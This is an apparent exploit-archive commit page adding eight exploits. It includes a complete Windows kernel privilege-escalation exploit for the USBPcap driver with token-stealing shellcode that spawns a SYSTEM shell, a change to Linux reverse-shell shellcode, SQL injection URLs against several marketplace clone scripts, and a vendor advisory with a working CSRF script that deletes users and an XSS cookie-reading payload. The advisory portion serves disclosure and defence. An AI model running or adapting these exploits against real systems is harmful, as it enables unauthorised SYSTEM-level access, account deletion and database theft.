bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2017-03-09

Browse source 
8 new exploits

USBPcap - Privilege Escalation

Linux - Reverse Shell Shellcode (66 bytes)
Linux - Reverse Shell Shellcode (65 bytes)
Themeforest Clone Script - SQL Injection
Graphicriver Clone Script - SQL Injection
Codecanyon Clone Script - SQL Injection
Audiojungle Clone Script - SQL Injection
Videohive Clone Script - SQL Injection
Envato Clone Script - SQL Injection
Navetti PricePoint 4.6.0.0 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery
This commit is contained in:
Offensive Security 2017-03-09 05:01:19 +00:00
parent 6883068111
commit 06a7933be4
10 changed files with 608 additions and 44 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

10
files.csv
View file

@ -8826,6 +8826,7 @@ id,file,description,date,author,platform,type,port
41458,platforms/linux/local/41458.c,"Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free Privilege Escalation",2017-02-26,"Andrey Konovalov",linux,local,0 41458,platforms/linux/local/41458.c,"Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free Privilege Escalation",2017-02-26,"Andrey Konovalov",linux,local,0
41476,platforms/windows/local/41476.txt,"Cisco AnyConnect Secure Mobility Client 4.3.04027 - Privilege Escalation",2017-02-28,Pcchillin,windows,local,0 41476,platforms/windows/local/41476.txt,"Cisco AnyConnect Secure Mobility Client 4.3.04027 - Privilege Escalation",2017-02-28,Pcchillin,windows,local,0
41538,platforms/windows/local/41538.cs,"CyberGhost 6.0.4.2205 - Privilege Escalation",2017-03-06,"Kacper Szurek",windows,local,0 41538,platforms/windows/local/41538.cs,"CyberGhost 6.0.4.2205 - Privilege Escalation",2017-03-06,"Kacper Szurek",windows,local,0
41542,platforms/windows/local/41542.c,"USBPcap - Privilege Escalation",2017-03-07,"Parvez Anwar",windows,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -15925,7 +15926,7 @@ id,file,description,date,author,platform,type,port
41282,platforms/lin_x86/shellcode/41282.nasm,"Linux/x86 - Reverse TCP Alphanumeric Staged Shellcode (103 bytes)",2017-02-08,"Snir Levi",lin_x86,shellcode,0 41282,platforms/lin_x86/shellcode/41282.nasm,"Linux/x86 - Reverse TCP Alphanumeric Staged Shellcode (103 bytes)",2017-02-08,"Snir Levi",lin_x86,shellcode,0
41375,platforms/linux/shellcode/41375.c,"Linux - Dual/Multi mode Bind Shell Shellcode (156 bytes)",2017-02-16,odzhancode,linux,shellcode,0 41375,platforms/linux/shellcode/41375.c,"Linux - Dual/Multi mode Bind Shell Shellcode (156 bytes)",2017-02-16,odzhancode,linux,shellcode,0
41381,platforms/win_x86/shellcode/41381.c,"Windows x86 - Protect Process Shellcode (229 bytes)",2017-02-17,"Ege Balci",win_x86,shellcode,0 41381,platforms/win_x86/shellcode/41381.c,"Windows x86 - Protect Process Shellcode (229 bytes)",2017-02-17,"Ege Balci",win_x86,shellcode,0
41398,platforms/linux/shellcode/41398.nasm,"Linux - Reverse Shell Shellcode (66 bytes)",2017-02-19,"Robert L. Taylor",linux,shellcode,0 41398,platforms/linux/shellcode/41398.nasm,"Linux - Reverse Shell Shellcode (65 bytes)",2017-02-19,"Robert L. Taylor",linux,shellcode,0
41403,platforms/lin_x86/shellcode/41403.c,"Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes)",2017-02-20,"Krzysztof Przybylski",lin_x86,shellcode,0 41403,platforms/lin_x86/shellcode/41403.c,"Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes)",2017-02-20,"Krzysztof Przybylski",lin_x86,shellcode,0
41439,platforms/linux/shellcode/41439.c,"Linux/x86-64 - Egghunter Shellcode (38 bytes)",2017-02-23,odzhancode,linux,shellcode,0 41439,platforms/linux/shellcode/41439.c,"Linux/x86-64 - Egghunter Shellcode (38 bytes)",2017-02-23,odzhancode,linux,shellcode,0
41467,platforms/win_x86/shellcode/41467.c,"Windows x86 - Executable Directory Search Shellcode (130 bytes)",2017-02-26,"Krzysztof Przybylski",win_x86,shellcode,0 41467,platforms/win_x86/shellcode/41467.c,"Windows x86 - Executable Directory Search Shellcode (130 bytes)",2017-02-26,"Krzysztof Przybylski",win_x86,shellcode,0
@ -37461,3 +37462,10 @@ id,file,description,date,author,platform,type,port
41543,platforms/php/webapps/41543.txt,"Mini CMS 1.1 - 'name' Parameter SQL Injection",2017-03-07,"Ihsan Sencan",php,webapps,0 41543,platforms/php/webapps/41543.txt,"Mini CMS 1.1 - 'name' Parameter SQL Injection",2017-03-07,"Ihsan Sencan",php,webapps,0
41544,platforms/php/webapps/41544.txt,"Daily Deals Script 1.0 - 'id' Parameter SQL Injection",2017-03-07,"Ihsan Sencan",php,webapps,0 41544,platforms/php/webapps/41544.txt,"Daily Deals Script 1.0 - 'id' Parameter SQL Injection",2017-03-07,"Ihsan Sencan",php,webapps,0
41546,platforms/aix/webapps/41546.txt,"Bull/IBM AIX Clusterwatch/Watchware - Multiple Vulnerabilities",2017-03-07,RandoriSec,aix,webapps,0 41546,platforms/aix/webapps/41546.txt,"Bull/IBM AIX Clusterwatch/Watchware - Multiple Vulnerabilities",2017-03-07,RandoriSec,aix,webapps,0
41548,platforms/php/webapps/41548.txt,"Themeforest Clone Script - SQL Injection",2017-03-08,"Ihsan Sencan",php,webapps,0
41549,platforms/php/webapps/41549.txt,"Graphicriver Clone Script - SQL Injection",2017-03-08,"Ihsan Sencan",php,webapps,0
41550,platforms/php/webapps/41550.txt,"Codecanyon Clone Script - SQL Injection",2017-03-08,"Ihsan Sencan",php,webapps,0
41551,platforms/php/webapps/41551.txt,"Audiojungle Clone Script - SQL Injection",2017-03-08,"Ihsan Sencan",php,webapps,0
41552,platforms/php/webapps/41552.txt,"Videohive Clone Script - SQL Injection",2017-03-08,"Ihsan Sencan",php,webapps,0
41553,platforms/php/webapps/41553.txt,"Envato Clone Script - SQL Injection",2017-03-08,"Ihsan Sencan",php,webapps,0
41554,platforms/multiple/webapps/41554.html,"Navetti PricePoint 4.6.0.0 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery",2017-03-08,"SEC Consult",multiple,webapps,0

Can't render this file because it is too large.

55
platforms/linux/shellcode/41398.nasm
View file

@ -21,51 +21,28 @@
;dealings in the Software. ;dealings in the Software.
; ;
; For a detailed explanation of this shellcode see my blog post: ; For a detailed explanation of this shellcode see my blog post:
; http://a41l4.blogspot.ca/2017/02/assignment-2b.html ; http://a41l4.blogspot.fr/2017/02/assignment-2b.html
; 22 bytes, zero nulls
global _start global _start
section .text section .text
_start: _start:
; Socket ; zeros RAX, RDX and RSI with only 4 bytes of machine code
push 41 xor esi,esi
pop rax mul esi
push 2
pop rdi ; null terminator for the following string
push 1 push rax
pop rsi
cdq ; push /bin//sh in reverse
syscall mov rbx,'/bin//sh'
; Connect
xchg edi, eax
push rdx
mov rbx, 0xfeffff80a3eefffd ; not encoded 0x0100007f5c110002
not rbx
push rbx push rbx
mov al, 42
push rsp
pop rsi
mov dl, 16
syscall
; Dup 2
push 3
pop rsi
dup2loop:
mov al, 33
dec esi
syscall
loopnz dup2loop
; Execve
; rax and rsi are zero from the result of the last dup2 syscall and loop
push rax ; zero terminator for the following string that we are pushing
mov rbx, '/bin//sh' ; store /bin//sh address in RDI, points at string
push rbx
; store /bin//sh address in RDI
push rsp push rsp
pop rdi pop rdi
cdq ; zero rdx ; Call the Execve syscall
mov al, 59 mov al, 59
syscall syscall

249
platforms/multiple/webapps/41554.html Executable file
View file

@ -0,0 +1,249 @@
<!--
SEC Consult Vulnerability Lab Security Advisory < 20170308-0 >
=======================================================================
title: Multiple vulnerabilities
product: Navetti PricePoint
vulnerable version: 4.6.0.0
fixed version: 4.7.0.0 or higher
CVE number: -
impact: high/critical
homepage: http://www.navetti.com/
found: 2016-07-18
by: W. Schober (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"Navetti PricePoint is the ultimate business tool for controlling, managing and
measuring all aspects of your pricing. Our clients have been able to increase
their revenue and profitability substantially, implement market- and value-based
pricing, increase customer trust and implement a common business language
throughout their organization. In addition, with Navetti PricePoint our clients
are able to implement governance processes, manage risk and ensure organization
compliance, and attain business sustainability."
Source:
http://www.navetti.com/our-expertise/navetti-pricepoint/
Business recommendation:
------------------------
During a quick security check, SEC Consult identified four vulnerabilities,
which are partially critical. As the time frame of the test was limited, it is
suspected that there are more vulnerabilities in the application.
It is highly recommended by SEC Consult to apply the patch resolving the
identified vulnerabilities before using Navetti PricePoint in an environment
with potential attackers.
Vulnerability overview/description:
-----------------------------------
1) SQL Injection (Blind boolean based)
Navetti PricePoint is prone to SQL injection attacks. The attacks can be
executed by all privilege levels, ranging from the lowest privileged users to
the highest privileged users.
By exploiting this vulnerability, an attacker gains access to all records
stored in the database with the privileges of the database user.
2) Multiple persistent cross site scripting vulnerabilities
The web application suffers from multiple persistent cross site scripting issues.
Low privileged users as well as high privileged users, are able to inject
malicious JavaScript payloads persistently in the application. This
vulnerability is even more critical, because it can be used by a low privileged
user who wants to elevate his privileges. The low privileged attacker can
place a payload which creates a new superuser, or add his own account to the
superuser group. If a superuser logs in to the application, the JavaScript
payload is executed with the rights of the superuser and the new user is
created or added to the superuser group.
3) Multiple reflected cross site scripting vulnerabilities
Navetti PricePoint suffers from multiple reflected cross site scripting issues.
The code which is used to generate error messages inside of the application,
does not correctly escape/sanitize user input. Due to that all error messages
containing user input are prone to reflected cross site scripting attacks.
Furthermore the file upload dialog does not correctly sanitize the file name of
uploaded files. If a file name contains a JavaScript payload, it is executed in
the file upload dialog.
4) Cross Site Request Forgery
Navetti PricePoint doesn't implement any kind of cross site request forgery
protection. Attackers are able to execute arbitrary requests with the privileges
of any user. The only requirement is, that the victim clicks on a malicious
link. For example an administrator can be forced to execute unwanted actions.
Some of these actions are:
-) Add users
-) Delete users
-) Add users to an arbitrary role
-) Change internal settings of the application
Proof of concept:
-----------------
1) SQL Injection (Blind boolean based)
The search function in the tree structure, which displays various groups, does
not properly validate user input, allowing an attacker with any privilege level
to inject arbitrary SQL commands and read the contents of the whole database.
The following URL could be used to perform blind SQL injection attacks:
-) URL: /NBN.Host/PMWorkspace/PMWorkspace/FamilieTreeSearch
(Parameter: searchString, Type: GET)
2) Multiple persistent cross site scripting vulnerabilities
The following URL parameters have been identified to be vulnerable against
persistent cross site scripting:
-) URL: /NBN.Host/Component/Competitors/AddEdit (Parameter: name,POST)
-) URL: /NBN.Host/Component/ItemSearchGrid/EditData (Parameter: Quality105,POST)
-) URL: /NBN.Host/component/GroupInfo/SaveGroup (Parameter: name,POST)
The proof of concept shows just selected examples of cross-site scripting
vulnerabilities. Based on the conducted tests, SEC Consult identified that
proper input validation is lacking.
Due to the limited time frame of the test, it was not possible to verify every
single parameter of the application. Therefore, it can be assumed, that there
are similar flaws in other parts of the web application.
3) Multiple reflected cross site scripting vulnerabilities
The application is also prone to reflected cross site scripting attacks. The
vulnerabilities were observed in at least two main parts of the application.
Those two parts are error messages and the file upload functionality.
-) Error Messages
Every user input which is reflected in error messages, is not correctly
escaped and injection of malicious JavaScript code is possible.
-) File uploads
The file upload functionality is not correctly escaping the filename of
uploaded files. If a victim is forced to upload a special crafted file, an
arbitrary JavaScript payload can be triggered and executed in the victim's
context. An example for a working, but very obvious payload in the filename
would be the following example:
-) <img src=x onerror=alert(document.cookies)>.xlsx
4) Cross Site Request Forgery
The application is prone to cross site request forgery attacks because no
measures such as CSRF tokens or nounces, are in place. The following proof of
concept deletes the user account
with ID 18:
-->
<html>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "https://($IP|$Domain)/NBN.Host/PermissionsManagement/
PermissionsManagement/DeleteUsers", true);
xhr.setRequestHeader("Accept", "*/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "text/plain");
xhr.withCredentials = true;
var body = "{\"DeleteAll\":false,\"UserIDs\":[\"18\"]}";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
<!--
If a victim visits a website, which is hosted by an attacker, the script above
would be executed and the user with the userID 18 would be deleted. Due to the
complete absence of measures against cross site request forgery, it can be
assumed that the application is vulnerable for this
kind of attack.
Vulnerable / tested versions:
-----------------------------
SEC Consult tested Navetti PricePoint 4.6.0.0.
This version was the latest version at the time of the discovery.
Vendor contact timeline:
------------------------
2016-07-27: Contacting vendor through info@navetti.com
2016-07-27: Vendor provided a technical contact who is responsible for
vulnerability coordination, furthermore clear-text communication
was requested.
2016-07-27: Providing advisory and proof of concept through insecure channel
as requested.
2016-08-05: Navetti provided a status update concerning a new version of
Navetti Price Point. The release date of the version, where all
the vulnerabilities are fixed, will be provided soon
2016-08-11: Navetti sent an update containing their upcoming release schedule.
The update of Navetti Price Point, which should fix all the
vulnerabilities, will be released on 2016-10-01.
2016-10-01: Patch available
2017-03-08: SEC Consult releases security advisory
Solution:
---------
Update to the latest version available. According to Navetti, all the
vulnerabilities are fixed in release 4.7.0.0.
According to the vendor, they have further improved their software security
since our initial contact.
Workaround:
-----------
No workaround available
Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/Career.htm
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF W. Schober / @2017
-->

17
platforms/php/webapps/41548.txt Executable file
View file

@ -0,0 +1,17 @@
# # # # #
# Exploit Title: Themeforest Clone Script - SQL Injection
# Google Dork: N/A
# Date: 08.03.2017
# Vendor Homepage: http://bsetec.com/
# Software : http://themeforestclone.bsetec.com/
# Demo: http://www.bsetecdemo.com/marketplus/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/LastAdded/?by=[SQL]
# # # # #

18
platforms/php/webapps/41549.txt Executable file
View file

@ -0,0 +1,18 @@
# # # # #
# Exploit Title: Graphicriver Clone Script - SQL Injection
# Google Dork: N/A
# Date: 08.03.2017
# Vendor Homepage: http://bsetec.com/
# Software : http://graphicriverclone.bsetec.com/
# Demo: http://www.bsetecdemo.com/graphicriverclone/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/LastAdded/?by=[SQL]
# # # # #

17
platforms/php/webapps/41550.txt Executable file
View file

@ -0,0 +1,17 @@
# # # # #
# Exploit Title: Codecanyon Clone Script - SQL Injection
# Google Dork: N/A
# Date: 08.03.2017
# Vendor Homepage: http://bsetec.com/
# Software : http://codecanyonclone.bsetec.com/
# Demo: http://www.bsetecdemo.com/codecanyonclone/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/LastAdded/?by=[SQL]
# # # # #

17
platforms/php/webapps/41551.txt Executable file
View file

@ -0,0 +1,17 @@
# # # # #
# Exploit Title: Audiojungle Clone Script - SQL Injection
# Google Dork: N/A
# Date: 08.03.2017
# Vendor Homepage: http://bsetec.com/
# Software : http://audiojungleclone.bsetec.com/
# Demo: http://www.bsetecdemo.com/audiojungleclone
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/LastAdded/?by=[SQL]
# # # # #

17
platforms/php/webapps/41552.txt Executable file
View file

@ -0,0 +1,17 @@
# # # # #
# Exploit Title: Videohive Clone Script - SQL Injection
# Google Dork: N/A
# Date: 08.03.2017
# Vendor Homepage: http://bsetec.com/
# Software : http://videohiveclone.bsetec.com/
# Demo: http://www.bsetecdemo.com/videohiveclone/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/LastAdded/?by=[SQL]
# # # # #

22
platforms/php/webapps/41553.txt Executable file
View file

@ -0,0 +1,22 @@
# # # # #
# Exploit Title: Envato Clone Script - SQL Injection
# Google Dork: N/A
# Date: 08.03.2017
# Vendor Homepage: http://bsetec.com/
# Software : http://envatoclone.bsetec.com/
# Demo: http://bsetecdemo.com/envatoclone/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/codes/php-scripts/?by=[SQL]
# http://localhost/[PATH]/graphics/graphics/?by=[SQL]
# http://localhost/[PATH]/themes/word-press/?by=[SQL]
# http://localhost/[PATH]/audios/music/?by=[SQL]
# # # # #

222
platforms/windows/local/41542.c Executable file
View file

@ -0,0 +1,222 @@
/*
Exploit Title - USBPcap Null Pointer Dereference Privilege Escalation
Date - 07th March 2017
Discovered by - Parvez Anwar (@parvezghh)
Vendor Homepage - http://desowin.org/usbpcap/
Tested Version - 1.1.0.0 (USB Packet capture for Windows bundled with WireShark 2.2.5)
Driver Version - 1.1.0.0 - USBPcap.sys
Tested on OS - 32bit Windows 7 SP1
CVE ID - CVE-2017-6178
Vendor fix url - not yet
Fixed Version - 0day
Fixed driver ver - 0day
USBPcap.sys
-----------
.text:992AF494 loc_992AF494:
.text:992AF494 mov ecx, [edi+8] ; DeviceObject
.text:992AF494
.text:992AF497 inc byte ptr [esi+23h]
.text:992AF49A add dword ptr [esi+60h], 24h
.text:992AF49E mov edx, esi ; Irp
.text:992AF4A0 call ds:IofCallDriver ; IofCallDriver function called without validating values !!!
.text:992AF4A6 push 18h ; RemlockSize
.text:992AF4A8 push esi ; Tag
.text:992AF4A9 push ebx ; RemoveLock
.text:992AF4AA mov edi, eax
.text:992AF4AC call ds:IoReleaseRemoveLockEx
.text:992AF4B2 mov eax, edi
kd> u nt!IofCallDriver
.
.
.
82a7111b eb0c jmp nt!IofCallDriver+0x63 (82a71129)
82a7111d 8b4608 mov eax,dword ptr [esi+8] ds:0023:00000008=???????? <------------ null pointer dereference
82a71120 52 push edx
82a71121 0fb6c9 movzx ecx,cl
82a71124 56 push esi
82a71125 ff548838 call dword ptr [eax+ecx*4+38h] <------------ control flow of execution
82a71129 5e pop esi
82a7112a 59 pop ecx
82a7112b 5d pop ebp
82a7112c c3 ret
*/
#include <stdio.h>
#include <windows.h>
#define BUFSIZE 4096
typedef NTSTATUS (WINAPI *_NtAllocateVirtualMemory)(
IN HANDLE ProcessHandle,
IN OUT PVOID *BaseAddress,
IN ULONG ZeroBits,
IN OUT PULONG RegionSize,
IN ULONG AllocationType,
IN ULONG Protect);
// Windows 7 SP1
#define W7_KPROCESS 0x50 // Offset to _KPROCESS from a _ETHREAD struct
#define W7_TOKEN 0xf8 // Offset to TOKEN from the _EPROCESS struct
#define W7_UPID 0xb4 // Offset to UniqueProcessId FROM the _EPROCESS struct
#define W7_APLINKS 0xb8 // Offset to ActiveProcessLinks _EPROCESS struct
BYTE token_steal_w7[] =
{
0x60, // pushad Saves all registers
0x64,0xA1,0x24,0x01,0x00,0x00, // mov eax, fs:[eax+124h] Retrieve ETHREAD
0x8b,0x40,W7_KPROCESS, // mov eax, [eax+W7_KPROCESS] Retrieve _KPROCESS
0x8b,0xc8, // mov ecx, eax Current _EPROCESS structure
0x8b,0x98,W7_TOKEN,0x00,0x00,0x00, // mov ebx, [eax+W7_TOKEN] Retrieves TOKEN
0x8b,0x80,W7_APLINKS,0x00,0x00,0x00, // mov eax, [eax+W7_APLINKS] <-| Retrieve FLINK from ActiveProcessLinks
0x81,0xe8,W7_APLINKS,0x00,0x00,0x00, // sub eax, W7_APLINKS | Retrieve _EPROCESS Pointer from the ActiveProcessLinks
0x81,0xb8,W7_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00, // cmp [eax+W7_UPID], 4 | Compares UniqueProcessId with 4 (System Process)
0x75,0xe8, // jne ----
0x8b,0x90,W7_TOKEN,0x00,0x00,0x00, // mov edx, [eax+W7_TOKEN] Retrieves TOKEN and stores on EDX
0x89,0x91,0xF8,0x00,0x00,0x00, // mov [ecx+W7_TOKEN], edx Overwrites the TOKEN for the current KPROCESS
0x61, // popad Restores all registers
0x83,0xc4,0x18, // add esp,18
0xc3 // ret
};
void spawnShell()
{
STARTUPINFOA si;
PROCESS_INFORMATION pi;
ZeroMemory(&pi, sizeof(pi));
ZeroMemory(&si, sizeof(si));
si.cb = sizeof(si);
si.cb = sizeof(si);
si.dwFlags = STARTF_USESHOWWINDOW;
si.wShowWindow = SW_SHOWNORMAL;
if (!CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi))
{
printf("\n[-] CreateProcess failed (%d)\n\n", GetLastError());
return;
}
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
}
int main(int argc, char *argv[])
{
_NtAllocateVirtualMemory NtAllocateVirtualMemory;
LPVOID addrtoshell;
NTSTATUS allocstatus;
LPVOID base_addr = (LPVOID)0x00000001;
DWORD written;
int rwresult;
int size = BUFSIZE;
HANDLE hDevice;
DWORD dwRetBytes = 0;
unsigned char buffer[BUFSIZE];
unsigned char devhandle[MAX_PATH];
printf("-------------------------------------------------------------------------------\n");
printf(" USBPCAP (usbpcap.sys) Null Pointer Dereference EoP Exploit \n");
printf(" Tested on Windows 7 SP1 (32bit) \n");
printf("-------------------------------------------------------------------------------\n\n");
sprintf(devhandle, "\\\\.\\%s", "usbpcap1");
addrtoshell = VirtualAlloc(NULL, BUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if(addrtoshell == NULL)
{
printf("[-] VirtualAlloc memory allocation failure %.8x\n\n", GetLastError());
return -1;
}
printf("[+] VirtualAlloc memory allocated at %p\n", addrtoshell);
memcpy(addrtoshell, token_steal_w7, sizeof(token_steal_w7));
printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_w7));
NtAllocateVirtualMemory = (_NtAllocateVirtualMemory)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtAllocateVirtualMemory");
if (!NtAllocateVirtualMemory)
{
printf("[-] Unable to resolve NtAllocateVirtualMemory\n");
return -1;
}
printf("[+] NtAllocateVirtualMemory [0x%p]\n", NtAllocateVirtualMemory);
printf("[+] Allocating memory at [0x%p]\n", base_addr);
allocstatus = NtAllocateVirtualMemory(INVALID_HANDLE_VALUE, &base_addr, 0, &size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (allocstatus)
{
printf("[-] An error occured while mapping executable memory (0x%08x) %d\n\n", allocstatus, GetLastError());
return -1;
}
printf("[+] NtAllocateVirtualMemory successful\n");
memset(buffer, 0x00, BUFSIZE);
memcpy(buffer+0x0000006b, &addrtoshell, 4);
rwresult = WriteProcessMemory(INVALID_HANDLE_VALUE, (LPVOID)0x00000001, buffer, BUFSIZE, &written);
if (rwresult == 0)
{
printf("[-] An error occured while mapping writing memory: %d\n", GetLastError());
return -1;
}
printf("[+] WriteProcessMemory %d bytes written\n", written);
printf("[+] Device handle %s\n", devhandle);
hDevice = CreateFile(devhandle, 0, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
if (hDevice == INVALID_HANDLE_VALUE)
{
printf("[-] CreateFile open %s device failed (%d)\n\n", devhandle, GetLastError());
return -1;
}
else
{
printf("[+] Open %s device successful\n", devhandle);
}
printf("[~] Press any key to send Exploit . . .\n");
getch();
DeviceIoControl(hDevice, 0x00090028, NULL, 0, NULL, 0, &dwRetBytes, NULL);
CloseHandle(hDevice);
printf("[+] Spawning SYSTEM Shell\n");
spawnShell();
return 0;
}